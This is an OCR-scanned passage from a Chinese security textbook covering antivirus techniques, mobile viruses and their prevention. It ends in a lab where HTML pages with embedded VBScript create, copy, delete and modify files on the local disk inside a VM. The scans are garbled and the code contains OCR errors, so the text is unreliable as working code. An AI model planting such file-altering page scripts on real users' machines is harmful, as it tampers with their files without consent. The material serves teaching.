如 果 用 户 的 计算 机 没有 连接 到 互联 网 ,此 时 本 地 计算 机 的 病毒 防护 就 依赖 于 病毒 特征 
库 了 。 通 常 在 第 一 次 安装 杀毒 软件 时 ,该 杀毒 软件 会 对 计算 机 进行 一 次 全 盘查 杀 ,此 时 病毒 
检测 引擎 会 根据 最 新 的 病毒 特征 库 进行 一 次 彻底 的 检查 ,清理 干净 本 地 的 安全 威胁 ,同时 这 
也 为 以 后 的 每 一 次 全 盘 检测 打下 了 坚实 的 基础 。 尽 管 新 型 病毒 并 不 是 每 天 都 会 产生 ,但 是 
已 有 病毒 的 变异 速度 很 快 ,为 了 检测 变异 了 的 病毒 ,就 不 得 不 建立 起 庞大 的 病毒 特征 库 ,每 
一 次 都 必须 对 计算 机 进行 全 面 的 检测 ,这样 就 导致 病毒 的 检测 效率 低下 。 因 此 ,杀毒 软件 会 
引入 一 个 “可 信和 度 ” 的 概念 ,在 首次 全 面 检 测 时 就 会 给 所 有 被 检测 的 对 象 授予 一 个 “可 信和 度 ”， 
当然 这 会 与 病毒 特征 库 的 内 容 进行 核对 ,所 有 被 认为 安全 的 部 分 都 会 在 以 后 的 各 次 检测 中 
忽略 ,以 提高 病毒 检测 效率 。 另 外 ,以 后 杀毒 软件 检测 出 的 任何 可 疑 行 为 ,在 比较 病毒 特征 
值 时 ,都 会 再 次 通过 和 网 络 病毒 中 心 的 最 新 反馈 予以 判断 ,从 而 确定 这 些 行为 是 否 安全 。 
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如 果 病 毒 感染 了 那些 被 杀毒 软件 认为 安全 的 对 象 怎么 办 ,此 时 只 能 依赖 基于 行为 检测 
的 主动 防御 。 基 于 行为 检测 的 主动 防御 措施 为 : 修复 已 经 感染 病毒 的 正常 系统 部 件 ; 采用 
虚拟 脱 壳 技术 隔离 病毒 ; 直接 将 感染 部 分 清除 或 恢复 至 上 次 正常 状态 。 杀 毒 软 件 清理 病毒 
时 依据 “最 小 破坏 性 最 大 化 修复 ”的 原则 ,同时 会 将 可 疑 行为 在 第 一 时 间 上 报 病 毒 中 心 。 


11.4.2 流行 杀毒 软件 概况 


随 着 免费 杀毒 软件 越 来 越 多 的 趋势 ,那些 收费 的 杀毒 软件 显得 越发 低调 ,其 中 以 国外 大 
牌 杀毒 软件 为 主 , 卡 巴 斯 基 、 迈 克 菲 .诺顿 等 市 场 占 用 率 似乎 都 在 缩减 ,但 是 凭借 着 其 可 靠 强 
力 的 病毒 库 , 以 及 与 时 俱 进 的 先进 防毒 手段 ,这 些 大 牌 收费 杀毒 软件 依然 坚守 各 自 的 阵营 。 
目前 常见 的 主流 杀毒 软 包 括 卡巴 斯 基 反 病毒 软件 .ESET NOD32 防 病毒 软件 .诺顿 防 病毒 
软件 .迈克 菲 防 病毒 软件 、BitDefender 防 病毒 软件 .AVG 免费 杀毒 版 .360 杀毒 .小 红 伞 免 
费 版 .腾讯 电脑 管家 、 瑞 星 杀 毒 、 金 山 毒霸 等 。 此 外 ,操作 系统 Windows 10 中 , Windows 
Defender 加 入 了 右键 扫描 和 离线 杀毒 功能 。 

对 于 基础 用 户 来 说 ,一 款 杀毒 软件 要 能 全 面 保护 操作 系统 、 屏 蔽 外 来 的 威胁 才 是 最 关键 
的 。 选 择 一 款 杀毒 软件 要 考虑 的 因素 应 该 包括 病毒 查 杀 木马 拦 截 、 网 购 测试 及 查 杀 病 毒 时 
的 内 存 占用 等 指标 。 


11.5 手机 病毒 概述 


11.5.1 手机 病毒 的 概念 


随 着 智能 手机 功能 的 强大 ,手机 连接 互联 网 的 功能 日 益 先 进 ,使 得 手机 这 个 私密 的 物品 
被 外 界 人 侵 的 威胁 日 益 凸 显 ,甚至 会 丢失 掉 手 机 中 的 重要 信息 。 手 机 病毒 是 一 种 具有 传染 
性 、 破 坏 性 的 手机 程序 ,可 用 杀毒 软件 进行 清除 与 查 杀 , 也 可 以 手动 印 载 。 其 可 利用 发 送 短 
信 彩信、 电子 邮件 浏览 网 站 .下 载 铃声 .蓝牙 等 方式 进行 传播 ,会 导致 用 户 手 机 死机 、 关 机 、 
个 人 资料 被 删 、 向 外 发 送 垃圾 邮件 泄露 个 人 信息 .自动 拨 打 电 话 ,发 短 ( 彩 ) 信 等 进行 恶意 扣 
费 ,导致 使 用 者 无 法 正常 使 用 手机 。 

2000 年 ,手机 公司 Movistar 收 到 大 量 由 计算 机 发 出 的 名 为 “Timofonica” 的 骚扰 短信 ， 
该 病毒 通过 西班牙 电信 公司 “Telefonica” 的 移动 系统 向 系统 内 的 用 户 发 送 脏话 等 垃圾 短信 。 
事实 上 ,该 病毒 最 多 只 能 称 为 短信 人 炸弹。 真正 意义 上 的 手机 病毒 直到 2004 年 6 月 才 出 现 ， 
那 就 是 “Cabir” 蠕 虫 病毒 ,这 种 病毒 通过 诺基亚 S60 系列 手机 复制 ,然后 不 断 寻 找 安装 了 蓝 
牙 的 手机 。 之 后 ,手机 病毒 开始 泛滥 。 手 机 病毒 受到 计算 机 病毒 的 启发 与 影响 ,也 有 所 谓 混 
合式 攻击 的 手法 出 现 。 
手机 中 的 软件 一 一 嵌入 式 操 作 系统 (固化 在 芯片 中 的 操作 系统 ,一 般 由 Java、C++ 等 语 
言 编写 ) ,相当 于 一 个 小 型 的 智能 处 理 器 ,所 以 会 遭受 病毒 攻击 。 而 且 , 短 信也 不 只 是 简单 的 
文字 ,其 中 包括 手机 铃声 .图 片 等 信息 ,都 需要 手机 中 的 操作 系统 进行 解释 ,然后 显示 给 手机 
用 户 ,手机 病毒 就 是 依靠 软件 系统 的 漏洞 来 人 侵 手 机 的 。 
手机 病毒 要 传播 和 运行 ,必要 条 件 是 移动 服务 商 要 提供 数据 传输 功能 ,而 且 手 机 需要 支持 
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Java 等 高 级 程序 写 人 功能 。 许 多 具备 上 网 及 下 载 等 功能 的 手机 都 可 能 会 被 手机 病毒 人 侵 。 
11.5.2 手机 病毒 的 危害 


1. 玩笑 性 影响 

属于 玩笑 性 的 手机 病毒 ,大 致 并 不 会 造成 手机 实体 上 或 操作 上 的 破坏 性 。 其 典型 包括 
如 下 内 容 。 

(1) 手机 荧 幕 持续 闪烁 ,如 Lights 病毒 。 

(2) 画面 显示 管 动词 语 或 可 怕 图 示 , 如 Ghost 病毒 会 出 现 *Everyone hates you” 信 息 。 

(3) 持续 发 出 哗 哗 声 , 如 FalseAlarm 病毒 。 

(4) 屏幕 上 出 现 乱 飞 的 小 飞机 ,如 Sprite 病毒 。 

(5) 出 现 格 式 化 信息 ,如 Fake 病毒 ,实际 上 并 不 会 造成 任何 伤害 。 

(6) 假装 下 载 恶意 程式 ,如 Alone 病毒 。 

2. 困扰 性 破坏 

所 谓 困 扰 性 手机 病毒 ,虽然 不 会 造成 手机 实体 上 或 运作 上 的 破坏 或 中 止 , 却 会 造成 手机 
使 用 上 的 困扰 ,甚至 进一步 阻止 手机 软体 的 更 新 。 

(1) 收发 垃圾 短信 : 许多 手机 病毒 是 运用 大 量 垃圾 短信 来 攻击 手机 的 ,虽然 不 见得 垃 
圾 短信 都 具有 危险 性 ,但 是 却 耗费 收 信者 的 宝贵 时 间 ,并 徒 增 许多 困扰 ,更 何况 垃圾 短信 很 
有 可 能 洪 藏 病毒 。 如 果 中 毒 ,使 用 者 也 可 能 在 不 知情 的 状况 下 沦 为 垃圾 短信 发 送 的 僵尸 或 
帮凶 。 例 如 ,武士 蠕虫 会 依 受害 者 手机 中 的 通讯 录 来 发 送 藏 有 病毒 的 短信 。 

(2) 阻止 手机 任何 更 新 与 下 载 。 例 如 ,Fontal 木马 , 透 过 破坏 手机 系统 中 的 程式 管理 
器 ,阻止 使 用 者 下 载 新 的 应 用 程式 或 其 他 更 新 ,并 且 还 会 阻止 手机 删除 病毒 。 

(3) 应 用 程式 无 法 运作 。 例 如 , 髓 斤 头 木 马 会 造成 手机 档案 系统 或 应 用 程式 无 法 运作 ， 
使 用 者 必须 重新 开机 。 

(4) 消耗 手机 电量 。 例 如 , 食 人 鱼 (Cabir) 蠕 虫 ,通过 不 断 搜寻 其 他 蓝牙 装置 ,进而 耗 尽 
手机 电量 。 

(5) 阻 断 蓝牙 通信 。 阻 断 手 机 与 任何 蓝牙 装置 ,如 耳机 或 其 他 蓝牙 手机 的 通信 与 连接 。 

(6) 中 断 短信 业务 的 运作 。 黑 客 对 MMS 服务 器 展开 DDoS 攻击 ,进而 导致 短信 业务 无 
法 正常 运作 。 

3. 实体 或 操作 上 的 破坏 

实体 或 操作 上 的 破坏 是 非常 严重 的 结果 ,使 用 者 不 但 无 法 继续 正常 使 用 手机 ,最 重要 的 
是 重要 信息 的 毁损 。 

(1) 手机 当 机 。 例 如 , 骇 客 可 借 由 手机 作业 系统 的 漏洞 展开 攻击 ,进而 造成 作业 系统 的 
停摆 。 

(2) 手机 自动 关机 。 频 繁 的 开关 机 ,可 能 会 造成 手机 零件 或 寿命 的 损害 。 

(3) 档案 资料 丧失 。 它 包括 电话 短 .通讯 录 .MP3 .游戏 照片 .图 铃 等 档案 的 遗失 ,如 骼 
手头 木马 。 

(4) 瘫痪 手机 防毒 软件 。 伪 装 成 防毒 厂商 的 更 新 码 ,诱骗 使 用 户 下 载 , 进 而 瘫痪 手机 防 
毒 软件 。 


tt 
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(5) 手机 按键 功能 丧失 ,如 SYMBOS_LOCKNUT 木马 。 

(6) 格式 化 内 建 记 忆 体 。 未 来 手机 若 内 建 硬 碟 ,也 可 能 面临 被 格式 化 的 风险 。 

(7) 黑客 取得 手机 系统 权限 。 骇 客 通过 手机 作业 系统 的 漏洞 , 即 可 在 不 经 过 使 用 者 的 
同意 下 ,取得 系统 部 分 甚至 全 部 权限 。 例 如 ,专攻 WinCE 手机 的 Brador 后 门 程式 ,中 毒手 
机 会 被 骇 客 远 端 下 载 档案 ,甚至 执行 特定 指令 。 

(8) 破坏 SIM 卡 。 黑 客 通过 早期 SIM 卡 的 资料 存 取 长 度 的 漏洞 来 展开 对 SIM 卡 的 直 
接 破 坏 。 

4. 金钱 损失 

随 着 计算 机 上 各 种 恶意 攻击 开始 与 金钱 利益 挂钩 之 后 ,手机 上 也 无 可 避免 有 此 趋势 的 
发 展 ,这 类 攻击 轻 则 增加 电话 费用 , 重 则 会 造成 网 路 交易 的 重大 损失 。 

(1) 增加 通信 费用 开支 。 因 为 成 为 黑客 操控 的 “短信 滥 发 机 ”, 导 致 费用 自然 高 涨 ,如 洪 
水 黑客 工具 。 

(2) 自动 拨打 电话 。 例 如 ,日 本 I-mode 即 曾 发 生 用 户 接收 恶意 MMS 之 后 ,不 断 拨打 
日 本 急难 救助 电话 110 的 事件 ,不 但 造成 社会 资源 的 浪费 ,也 会 增加 使 用 者 的 电话 费用 。 

(3) 被 转 打 国际 电话 。 黑 客 通过 Pharming 手法 ,直接 算 改 使 用 者 手机 通讯 录 , 让 使 用 
者 在 拨打 电话 时 ,莫名 其 妙 地 被 转 打 到 国外 ,进而 造成 使 用 者 电话 费用 高 涨 。 

(4) 自 改 下 单 资 料 。 移 动 电子 商务 的 发 展 ,如 今 通过 手机 下 单 的 用 户 越 来 越 多 ,所 以 今 
后 也 有 可 能 会 发 生 黑 客 基于 某 种 利益 ,进而 算 改 使 用 者 的 下 单 资料 ,进而 导致 使 用 者 买 错 单 
或 因此 造成 投资 上 的 损失 。 

5. 机 密 性 伤害 

任何 安全 防护 的 最 终 目的 , 即 在 于 保障 机 密 资料 的 安全 性 ,所 以 手机 病毒 所 引发 的 机 密 
性 资料 的 外 露 , 可 以 说 是 杀伤 力 最 大 的 破坏 行为 。 

(1) 窃取 行事 历 或 通信 录 。 将 内 藏 后 门 程式 的 软件 或 游戏 ,伪装 成 合法 软体 或 免费 软 
件 , 并 诱骗 使 用 者 下 载 ,进而 窃取 行事 历 或 通讯 录 等 重要 资料 。 

(2) 窃取 个 人 隐私 照片 。 未 来 不 排除 会 发 生 黑客 经 由 蓝牙 .Wi-Fi 或 其 他 方式 ,窃取 名 
人 的 隐私 照片 ,并 借以 恐吓 或 诈骗 。 

(3) 线 上 交易 资料 外 露 。 如 今 通 过 手机 也 可 进行 线 上 银行 或 网 络 交 易 等 活动 ,所 以 相 
关 资 料 也 可 能 暴露 在 手机 病毒 或 骇 客 攻击 的 风险 之 中 。 


11.5.3 手机 病毒 的 防范 


(1) 删除 乱码 短信 彩信。 乱码 短信 、 彩 信 可 能 带 有 病毒 , 收 到 此 类 短信 后 立即 删除 ,以 
免 感染 手机 病毒 。 

(2) 不 要 接受 陌生 请 求 。 利 用 无 线 传送 功能 (如 蓝牙 、 红 外) 接收 信息 时 ,一 定 要 选择 安 
全 可 靠 的 传送 对 象 ,如 果 有 陌生 设备 请 求 连接 最 好 不 要 接受 。 因 为 手机 病毒 会 自动 搜索 无 
线 范围 内 的 设备 进行 病毒 的 传播 。 

(3) 保证 下 载 的 安全 性 。 网 上 有 许多 资源 提供 手机 下 载 ,然而 很 多 病毒 就 隐藏 在 这 些 
资源 中 ,这 就 要 求 用户 在 使 用 手机 下 载 各 种 资源 时 确保 下 载 站 点 是 否 安 全 可 靠 ,尽量 避免 去 
个 人 网 站 下 载 。 

(4) 选择 手机 自 带 背景 。 漂 亮 的 背景 图 片 与 屏保 固然 让 人 赏心悦目 ,但 图 片 中 带 有 病 
毒 就 不 严 了 ,所 以 用 户 最 好 使 用 手机 自 带 的 图 片 进 行 背景 设置 。 
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(5) 不 要 浏览 危险 网 站 。 例 如 ,一 些 黑客 ,色情 网 站 ,本 身 就 是 很 危险 的 ,其 中 隐匿 着 许 
多 病毒 与 木马 ,用 手机 浏览 此 类 网 站 是 非常 危险 的 。 

(6) 使 用 “古董 机 ”的 人 可 以 100% 放 心 。 这 里 说 的 “古董 机 ”是 指 非 智 能 手机 ,“ 古 董 机 ” 
是 无 法 连接 WAP 网 的 手机 ,可 以 放心 使 用 ,病毒 无 法 感染 这 种 手机 。 

(7) 安装 手机 安全 软件 。 手 机 安全 ,手机 杀毒 软件 逐渐 占有 着 非常 重要 的 地 位 。 手 机 
杀毒 软件 需要 具有 病毒 扫描 、 实 时 监控 网 络 防火 墙 \ 在 线 更 新 、 系 统管 理 等 功能 ,全 方位 地 
保护 手机 安全 。 


< 于 计算 机 病毒 与 防范 


/ 实 训 目的 

1. 了 解 计算 机 病毒 的 分 类 。 

2. 了 解 磁盘 文件 对 病毒 的 运行 过 程 。 

/ 实 训 环 境 

1. 设备 : 计算 机 。 

2. 软件 : 配置 好 的 VMware Workstation 6 虚拟 机 。 

A 实 训 丙 容 

磁盘 文件 对 病毒 实例 演示 。 注 意 , 部 分 文件 夹 路 径 可 能 需要 修改 ,如 c:\document and 
settings\gchy\ 桌 面 \test. htm, 请 读者 结合 自己 虚拟 机 的 实际 情况 修改 一 下 。 

/ 实 训 步 取 


第 1 步 ,在 DD:\ 创 建文 件 夹 soft, 然 后 在 soft 中 创建 4 个 记事 本 文件 ,分 别 命名 为 创建 、 
复制 .删除 和 修改 ,如 图 11-1 所 示 。 


3 文件 人 ) ”编辑 下 ) 查看 @) 收 阅 由 工具 XI) 和 帮助 00 


: Osa © 诊 Pr 攻 xx | 国 - 


地址 @@) | 加 Dp:\soft 


文件 和 文件 夹 任务 


加 刍 一 个 新 文件 夹 
已 接 注 人 文件 天 发 和 到 
| 


PETTY 


图 11-1 在 文件 夹 soft 下 新 建 记 事 本 文件 
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第 2 步 ,打开 记事 本 文件 “创建 ”, 输 入 文本 内 容 , 如 图 11-2 所 示 。 


蕊 创建 - 记事 本 

文件 时) 编辑 EE) 格式 中 ) 查看 WW) 帮助 0 
<HTHL> 

<HEAD> 


<TITLE? 邓 | 建文 件 c:YTEST.HTMKZATITLE> 

<SCRIPT LANGUAGE="VBScript"> 

C9- 

Dim Fso, fF1 

Set fso = CreateQbject("Scripting.FileSysten0bject") 
Set f1 = fso.CreateTextFile("c:\TEST.HTM", True) 

--> 

</SCRIPT> 

</HEAD> 

<BODY> 


Inl, call 


图 11-2 在 记事 本 文件 “创建 "中 输入 内 容 
第 3 步 ,打开 记事 本 文件 “复制 ”, 输 入 文本 内 容 , 如 图 11-3 所 示 。 


文件 @) 编辑 EF) 格式 @) 查看 W) 帮助 0 
<HTML> 
<HEAD> 
<TITLE> 复 制 c:\TEST .HTM 廊 件 到 桌面 </TITLE> 
《SCRIPT LANGUAGE="VBScript"> 
kt 
Dim fso, tf 
Set fso = Create0bject("Scripting.-FileSystem0bject") 
Set tf = fso.GetFile("c:\TEST.HTM") 
tf.Copy (“GC:\Docunents and Settings\gchy\ 桌 面 \TEST.HTH") 


Ing, Col 12 


种 复制 - 记事 本 加 回国 


11-3 ”在 记事 本 文件 “拷贝 "中 输入 内 容 
第 4 步 ,打开 记事 本 文件 “删除 ”, 输 入 文本 内 容 , 如 图 11-4 所 示 。 


重 删除 本 

文件 @) 编辑 下 ) 格式 四 ) 查看 W) 和 帮 助 oD 
<HTML> 

<HEAD> 


<TITLE> 考 除 桌面 上 的 TEST.HTH</TITLE> 
<SCRIPT LANGUAGE="UBScript"> 
<4-- 
Din fso, tf 
Set fso = Create0bject("Scripting-FileSysten0bject") 


tf .Delete 
> 
</SCRIPTY> 
</HEAD> 
<BODY> 


Set tf = fso-6etFile("C:\Documents and Settings\gchy\ 桌 面 \TEST.HTM") 


Inl, Col7 


图 11-4 在 记事 本 文件 “删除 ”中 输入 内 容 
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第 5 步 ,打开 记事 本 文件 “修改 ”, 输 入 文本 内 容 , 如 图 11-5 所 示 。 


文件 下 六 辑 下) 格式 人 0) 查看 中 帮助 如 
<HTML> 
<HEAD> 
IcTITLE> 修 改 文件 内 容 c:MEST .HTHC/TITLE> 
<SCRIPT LANGUAGE="UBScript"> 
?一 

Din fso, tf 

Set fso = Create0bject("Scripting-FileSysten0bject") 
ET True)》 
tF-Writeiine("Chtml>Kbody> 由 阅 页 脚本 的 方式 修改 已 存在 文件 内 容 成 功 
vodg>cyntml 

， 向 文 件 写 三 个 换行 字符 。 


tf -WriteBlankLines(3) 


， 写 一 行 
tf Write ("This is a test.”) 
tf -Close 

eg 

/SCRIPT> 

</HEAD> 

<BODY> 


In 20, Col 1 


图 11-5 在 记事 本 文件 “修改 ”中 输入 内 容 
第 6 步 ,将 记事 本 文件 创建 保存 为 HTML 文档 ,如 图 11-6 和 图 11-7 所 示 。 


重 创建 - 记事 本 


Con 

Culo 

ctrlts TATHO/TITLE> 
cript"> 


cum lt"scripting.Filesystenobject") 
xtFile("c:\TEST.HTH", True) 


图 11-6 打开 “另存 为 ”对话 框 


3 电站 
同上 部 所 
文件 各 加 [EE > 保存 @ 
保 友 类 型 | 所 有 文件 加 取 滑 
六 码 四) ARST 图 


11-7 将 记事 本 文件 创建 保存 为 HTML 文档 
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第 7 步 ,将 所 有 的 记事 本 文件 均 保存 为 HTML 文档 ,如 图 11-8 所 示 。 


; 立 件 @) 编辑 人 E) 查看 如 收 豪 和 工具 CD) 帮助 0 


四 银 -上 目 -让 用 时 了 xz#x | 国 - 


地 址 名) | 加 nseft 


文件 和 文 沂 夹 任务 。 【人 A] 


加 和 时 一 个 新 文件 天 
并 六 TH 到 
| 


包 哇 
360seURL 
1 


大 

360seURL 

1 玛 
人 建 


11-8 将 所 有 的 记事 本 文件 均 保 存 为 HTML 文档 
第 8 步 ,将 主机 上 的 文件 夹 D:\ soft 映射 为 虚拟 机 上 的 共享 文件 夹 testfolder, 并 复制 


testfolder 中 的 HTML 文件 ,如 图 11-9 所 示 。 


WinXP Vivare Workstation 
文件 EF) 编辑 E) 查看 如) 虚拟 机 虽 分 姐 区 ) 窗口 @@) 帮助 人 0 
是 [全 印 丙 硬 :器 下 加 | 回 占 


创 这 栏 x 
SP Fe older 
re 文件 中 ”编辑 下 查看 收藏 和 工具 CD) 大助) 
WinXP 
所- 日 - 访 记 时 多 xx| 国 - 


elgg 


增 柱 0) | 加 2:\testfolder 


田 惕 同上 邻居 


司 回 k 站 [id 


ware Tools installed successfully. 


文件 夫 x em 
[BEL 大 有 打开 @) 
田 办 我 的 广东 在 同一 窗口 中 打开 (A) 


日 旺 我 的 电脑 浊 。 打 印字 ) 
田 昌 35 软 笃 4:) 着 编辑 四) 
国 < 本 地 贬 盘 (C:)】 打开 方式 0 
田 她 DYm-RAI 红 动 器 0D:) 
< 本地 珊 盘 下) 发 到 OD 
国 < 本 地 出 盘 中 :) i 蔓 切 0) 
日 五 hest 上 的 Shared Fol 复制 {) 

DD testfolder -一 一 -一 一 一 一 
国耻 控制 面板 创建 快捷 方式 GE) 
田 回 共享 文档 删除 吧 ) 

回 schy 的 文档 重 命名 如 


11-9 复制 testfolder 中 的 HTML 文件 
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第 9 步 ,将 testfolder 中 的 HTML 文件 粘贴 到 虚拟 机 E:\ 中 ,如 图 11-10 和 图 11-11 
所 示 。 


: 文件 FE) 能 辑 E) 查看 o 虚拟 机 则 ”分 钥 人 0) 窗口 和 帮助 0D 
i WD :加 辣 六 :国定 日 口 晶 图 
at “四 


ab PR 希 本 地 忘 盘 (E:) 


日 名 Farorites 编辑 EE) 查看 WD 收 训 &) 工具 0) 帮助 虽 
号 ia 
四 银 - 目 -让 Ps | 
地 址 D) |<p F:\ 


文件 丙 


文件 天 | [~ 


田 辐 我 的 文档 
日 量 我 的 电脑 查看 中 » 
国 旧 3.5 软盘 以 :) 
国 < 丰 地 磁盘 CC:) Pl 
国电 DYD-EMl 3 器 0:) g@ 

< 本 地 磁盘 GE:) 范 贴 到 ) 

< 本 地 笠 盘 G:) 车 陆 快 提 方 式 GE) 
日 饰 ….hosf 上 的 Shared Fol 

© testfolder 新 渤 @) 

国 区 控制 面板 
田 各 共享 文 黑 性 @&) 
国 加 eehy 的 文档 
国 蝎 同居 

加 回收 站 


|wwara Tools installed successfully. 瑟 他 唱 回 TE 
图 11-10 将 testfolder 中 的 HTML 文件 粘贴 到 虚拟 机 EE:\ 中 


WinXP — Vvare Workstation 


文件 下 ) ”编辑 下 ) 查看 Y) 虚拟 机 如” 分 组) 窗口 人 帮助 由 
昌明 | 全 :和 芯 画 踢 : 吕 轩 回回 回国 | 
伍 演 栏 x EERZ Dwinxp 
日 区 Ponered On 1 
国 win 名 本 地 磁盘 (E:) 
BD Fevorites 文件 四 ” 编 铝 如 ”查看 WD 收藏 和 工具) 帮助 0 [9 
国 WimP 
@ 扫 :人 全- 唐 记过 | 也 xXHx| 


地 址 WW) [< BS Ea 


田 旧 35 软盘 以 ) 
田 二 本 地 辜 甬 人:) 
田 她 Dm-Hhn 缀 动 器 0.) 
本 < 本 地 磁 僵 下:) 
< 本 地 型 甬 全 :】 
日 轰 和 host 上 的 Shared Fol 
BD testfolder 
因 思 近 币 面板 
国 回 共享 文档 
国 回 schy 的 文档 
国 蝎 同上 久居 
司 回收 站 


图 11-11 查看 HTML 文件 的 粘贴 结果 
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第 10 步 ,打开 文件 “创建 . htm”, 如 图 11-12 所 示 。 


[i 


5 文件 四 能 可 查看 WD 碟 执 机 如 分 组 人 窗口 如 帮助 中 
ET ET 回回 图 


侧 边 栏 x 
日 区 Porered On 


国 timr 


日 各 Pavorites 


国 Winr 


工具 中 


帮助 加 


文件 下) 岛 辑 于 ) 查看 人 收藏 和 


制 
打开 @) 一 名 本 Docunent 
在 同一 窗口 中 打开 必 ) 
打印 到 ) 到 
国 占 3.5 软 角 4:) 绽 术 区 ) )TWL Docunent 
国 加 丰 地 得 双 C:) 了 
国志 DYp-RA 3 动 器 0:) 让 2 
图 < 本 地 磋 盘 EF;) 发 关 到 吧 虹 
二 本 地 锐角 B:) 
日 驾 和 bost 上 的 shured Fol Dedeh 
BB testfolder 复制 C) 
国 区 控制 面板 创 津 快 搜 方 式 G) 
国 加 共 李 文档 最 除 四 ) 
轩 加 schy 的 文档 重 命 名 0 


田 量 同居 
加 回收 站 


屎 性 @B) 


图 11-12 打开 文件 “创建 . htm” 
第 11 步 ,在 弹出 的 “信息 栏 " 对 话 框 中 单 击 “ 确 定 ” 按 钮 ,如 图 11-13 所 示 。 


文件 中 编辑 世 ) 查看 虚拟 机 他 分担 G)。 窗口 加 帮助 
a uD9 | 也 硬 矿 :回电 日 口 加 加 
[人 x 到 
日 区 Ponered On 
时 nis 
日 熏 Favorites 件 E) 查看 WW) 收 半 (A) 工具 I] 帮助 Qf 
Wim Dy 
加 三- 日- 国 国 多 有 记 时 次 Wnx 加 安生 
闻 让 加 | 居 \ 计 hte DY He” 
六 人 2 的 人 全 ，Tnternet Blorer 已 隐 制 广 伯 可 能 沪 问 人 0 计划 和 活动 内 容 。 单 此 人 处 坦 看 x 
您 注意 到 信息 栏 了 吗 ? 
Internet 
本 中 
查找 信息 企 
口 不 再 显示 此 信息 中)。 
而 二 下 各 ED) 
East 再 


11-13 ”弹出 的 “信息 栏 ” 对 话 框 
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第 12 步 ,在 快捷 菜单 中 选择 “允许 阻止 的 内 容 ” 选 项 ,如 图 11-14 所 示 。 


WinXP - YEware Workstation 


; 文件 四 编辑 @) 查看 WW) 虚 执 机 如 分 组 名 
i [DB ;各 聊 代 :加 
人 bi 栏 x 
El 局 创建 文件 c:\TEST. HTE - 了 icrosoft Internet Explorer 加 
m0 文件 四 ”编辑 加 ”查看 加” 收 豪 和 ) 工具 加 帮助 0D E32 
人 im 
四 外 -四 -四 国人 的 用 县 玉 tmx 思 全 -全 国 轧 
地 址 加 ) | 全 了，\ 提 隆 tn 站 9 >” 
加 六 二 9 的 安全 ，Internet Exylorer 已 本 限制 此 六 人 显示 可 能 访问 人 的 计算 机 的 活动 内 容 。 单 击 此 外 查看 X 
区 许 阻 上 的 内 容 ) 
有 何 风险 QD)? 
信息 栏 帮 助 0 
各 本 地 开盘 全 :) 各 
Vmware Tools installed successEully. 已 攻 品 思 对 下 


图 11-14 “人 允许 阻止 的 内 容 " 选 项 
第 13 步 ,在 “安全 警告 ”对话 框 中 单 击 “ 是 ”按钮 ,如 图 11-15 所 示 。 


nkP e Workstation 


;文件 于) 护 辑 于 ) 查看 WD 虚拟 机 如 ”分 姐 ) 窗口 如 ) 帮助 如 
由 PO :两 呈 :回国 回 | 回 回 
便 这 栏 x 
Sb Ee t Explorer 
日 各 Favorites K E) ”查看 T 0 
号 Pin 己 
四国 国 折 万 是 次 wmx 加 包 - 生 国 总 
地 直 加 | 佑 :\ 建 .hum 刁 因 到 放手” 
@ sd Internet Explorer 已 经 限制 此 文件 显示 可 能 访问 悠 的 计算 机 的 活动 内 容 ， 单 击 此 处 查看 x 
心 PEE et A 控件 ) 可 能 对 悠 有 所 帮助 ， 
您 确实 要 让 此 文件 运行 活动 内 容 吗 ? 
Ew | CE 
DE 妥 文 件 c-\TES 
[Veare Tools installed successEully Sy Fr 


图 11-15 “安全 警告 "对 话 框 
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第 14 步 ,在 允许 交互 对 话 框 中 单 击 “ 是 ”按钮 ,如 图 11-16 所 示 。 


可 inXP TYHware Workstation 
i 文件 中) 艇 辑 开 ) 查看 GD) 虚拟 机 如 分 姐 人 十 口 轨 天 助 如 
i DD 名 病态: 器 革 加 | 回回 国 | 
例 光 栏 x wp x 
日 区 Porered On 一 
于 创建 文件 c: \TEST- HTE - 了 icrosoft Internet Explorer 


六 


中 Yin 
日 亿 Favorites 查看 WD ”收藏 由 工具 四 条 有 动 由 
号 ia | py FE 
目 - 因 国 旬 时 次 加 思 - 辣 国 总 
地 址 | 外.\ 娃 hts > .4 


Internet Explorer 


By We 


Co 


忌 我 的 电 及 


10;29 


EP TO 


iware Tools installed successfully. 


图 11-16 ”人 允许 交互 对 话 框 
第 15 步 ,查看 文件 “创建 . htm” 的 运行 结果 ,如 图 11-17 和 图 11-18 所 示 。 


i 文件 四 _ 编 弗 芭 查看 WW 庶 执 机 如 分 相 吕 窗口 如 帮助 如 
i 有 | 你 : 作 瑟 他 :| 四 回回 | 器 回国 | 
全 过 栏 > EER Dwnxr | x 


a ed 入 创建 文件 c: \TEST. HTE _ icrosoft Internet Explorer 回回 四 
日 志 Pavorites 文件 人 ) ”编辑 下 ) 查看 人) 收 标 个 ) 工具 I) 帮助 00 [3 


es @s- 日- 国 加 的 Pr 六 ex @| 全 -如 国志 


地 址 | 他 E\ 他 尘 . htn 汪 因 到 二 EE ” 


Ps 咎 本 地 磺 盘 人 F:】 潮 凶 建 文件 c-ATEST = [10%0 
ieare Tools installed successEully 已 区 品 图 对 有 


图 11-17 文件 “创建 .htm” 的 运行 结果 
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WinkP 一 


YEware Workstation 
| 文件 和 D 编辑 全 查看 和 虚拟 机 如 分 姐 区 ) 窗口 和 帮助 四 
i WPlD | 各 季节 : 因 写 加 回回 辐 | 
人 边栏 x 
日 区 Powered On 

苇 WimxP 
日 从 Favorites 


时 WimP 


文件 EE) 编辑 区 ) 查看 G) 收 京 @) 工具 GD) 帮助 中 
@ 握 - 卓 - 访 甩 时 | 及 x 村 | 国 
地 址 QD) |<p c:\ 


Docunents and 
Settings 


田 右 3.5 软盘 以:) 
日 本 地 磁盘 (5:) 
国 已 Docunents snd Set 
国 回 Prope Files 
国 回 mmows 
国电 DYyD-RAN 绍 动 器 0:) 
国 经 本 地 硬盘 人 F;) 
< 本 地 瑞生 9 ) 
日 细 ” host 上 的 Shared 
BB testfolder 
国 世 近 制 面板 
国 局 共享 文档 
国 已 sehy 的 文档 
国 量 同上 攻 居 


vet 


El Progren Files 


司 回 # 


ar Tools installed successfully. 


图 11-18 在 C 盘 根 目 录 下 创建 的 文件 TEST. htm 
第 16 步 ,打开 文件 “复制 .htm”, 如 图 11-19 所 示 。 


面 


WinXP 一 
文件 中 编 强 于) 查看 W) 虚拟 机 呈 。 分 组 人 窗口 和 帮助 0 
ee] 
全 这 栏 
日 D Peered On 
忆 ia 各 本 地 成 盘 (E:) 
日 SS 文件 @) ”编辑 上 E) 查看 WD 收藏 和 ) 工具 上 帮助 0 
iD > Be 
